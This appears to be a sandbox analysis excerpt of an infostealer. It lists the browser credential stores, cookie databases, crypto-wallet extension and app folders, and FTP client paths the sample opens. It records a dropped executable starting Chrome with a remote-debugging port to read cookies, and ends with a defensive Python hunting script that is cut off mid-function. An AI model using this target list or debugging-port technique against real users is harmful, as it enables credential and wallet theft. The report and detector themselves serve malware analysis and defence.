Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: Yara match File source: 0000000A.00000003.2693159452.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2693380324.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2693505617.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2716905695.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2742429742.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2717592699.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2828932189.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2669358178.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cfc45d1c7c.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cfc45d1c7c.exe PID: 2708, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: 0000000D.00000003.2776187475.0000000000F83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 064deba48e.exe PID: 5660, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 064deba48e.exe PID: 4148, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: cfc45d1c7c.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cfc45d1c7c.exe PID: 2708, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0000001E.00000002.2934072138.0000000000151000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2746064201.0000000000151000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2705375842.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2749590843.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2943159738.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2842925428.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 686764db73.exe PID: 5800, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 686764db73.exe PID: 6596, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
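The process-creation entry above is the concrete form of the "Attempt to bypass Chrome Application-Bound Encryption" signature: a dropped executable in the user's Temp directory starts chrome.exe with --remote-debugging-port=9222, so the stealer can read cookies and site data from the live browser over the DevTools protocol without ever decrypting the App-Bound key. That launch is easy to hunt for in process-creation telemetry. The following Python is an added example, not part of this report or of any vendor tooling: it scans Sysmon Event ID 1 style records serialized as JSON lines and rates a browser launch by who its parent is. The log records are constructed; the first reproduces the command line and parent path from the report, while the PIDs, the other command lines and the LEGIT_PARENTS allowlist are assumptions.

```python
"""Hunt for Chromium browsers launched with a DevTools remote-debugging port.

Added example (not part of the sandbox report): scans Sysmon Event ID 1 style
process-creation records, serialized as JSON lines, for the launch pattern the
report recorded, a dropped executable in %TEMP% starting chrome.exe with
--remote-debugging-port=9222. All events below are constructed; PIDs and the
non-report command lines are assumptions.
"""
import json
import ntpath
import re
from dataclasses import dataclass
from typing import Optional

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe"}
# Parents that may legitimately enable remote debugging (dev tooling, WebDriver); assumption.
LEGIT_PARENTS = {"code.exe", "devenv.exe", "node.exe", "chromedriver.exe", "msedgedriver.exe"}
DEBUG_FLAG = re.compile(r"--remote-debugging-(?:port|pipe)(?:=(\d+))?", re.IGNORECASE)
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\AppData\\|Users\\Public\\|ProgramData\\|Windows\\Temp\\)", re.IGNORECASE)


@dataclass
class Finding:
    pid: int
    image: str
    parent_image: str
    port: Optional[str]
    headless: bool
    severity: str
    reason: str


def analyze(event: dict) -> Optional[Finding]:
    """Return a Finding when a browser process was started with remote debugging on."""
    image = ntpath.basename(event.get("Image", "")).lower()
    if image not in BROWSERS:
        return None
    cmdline = event.get("CommandLine", "")
    flag = DEBUG_FLAG.search(cmdline)
    if flag is None:
        return None
    parent = event.get("ParentImage", "")
    parent_name = ntpath.basename(parent).lower()
    if parent_name in BROWSERS:
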